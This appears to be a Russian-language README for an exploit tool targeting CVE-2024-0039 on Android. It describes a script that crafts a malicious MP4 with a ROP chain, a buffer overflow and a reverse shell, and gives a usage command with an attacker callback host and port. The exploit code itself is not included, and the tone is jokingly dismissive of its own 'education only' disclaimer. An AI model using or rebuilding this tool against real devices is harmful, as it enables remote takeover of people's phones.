## https://sploitus.com/exploit?id=9F200C75-EFCC-5E4E-A58C-B2CE51EC8BAA
# CVE-2024-0039-Exploit
## Описание
Python-скрипт для использование уязвимости CVE-2024-0039: выполнения произвольного кода на уязвимых устройствах Android.
**ВНИМАНИЕ**: Этот код предназначен только для образования и созидания, службе на стороне добра, тксзть!
## Использование
Запустите скрипт с необходимыми аргументами:
```bash
python exploit.py --cb-host <Ваш IP> --cb-port <Ваш порт> --output exploit.mp4
```
## Структура проекта
- **exploit.py**: Основной скрипт эксплоита, который создает вредоносный MP4 файл и логирует процесс выполнения.
- **logs/**: Дневник для вашего образовательно созидательного злодейства.
- **exploit.log**:
- **utils/**: Суда вынесены хелперы для чистоты кода
- **helpers.py**
- **tests/**: Тесты (придерживаемся лучших практик)
- **exploit.test.py**
## Что делает этот код:
### Функция `create_malicious_payload`
Создает вредоносный полезный груз с ROP-цепочкой и обратным подключением (reverse shell).
- **Создаем ROP цепочку**: Настройка ROP цепочки для выполнения произвольного кода.
- **Создаем переполнение буфера (и заполняем его буквой 'A')**: Заполнение буфера "A"-шками для переполнения.
- **Создаем полезную нагрузку для обратного подключения (не пытайтесь это дома)**: Настройка обратного подключения.
### Функция `write_to_file`
- Генерируем добро в файл
### Главная часть кода
- Создание добра в файл
- Запись в файл
- Сообщение об успешном создании файла
## Логирование
Логи сохраняются в `logs/exploit.log`. Логирует действия скрипта, такие как создание ROP цепочки, переполнение буфера, запись в файл и успешное выполнение эксплоита.
## Примечание
- Все адреса и команды в ROP-цепочке являются примерными и должны быть настроены в соответствии с конкретной уязвимостью и целью.
- Этот код предназначен только для образовательных целей и не должен использоваться для несанкционированных действий.
## Лицензия
Этот проект лицензирован под лицензией MIT - см. файл `LICENSE` для получения подробной информации. Потому что даже хакинг должен быть легальным... ну, почти.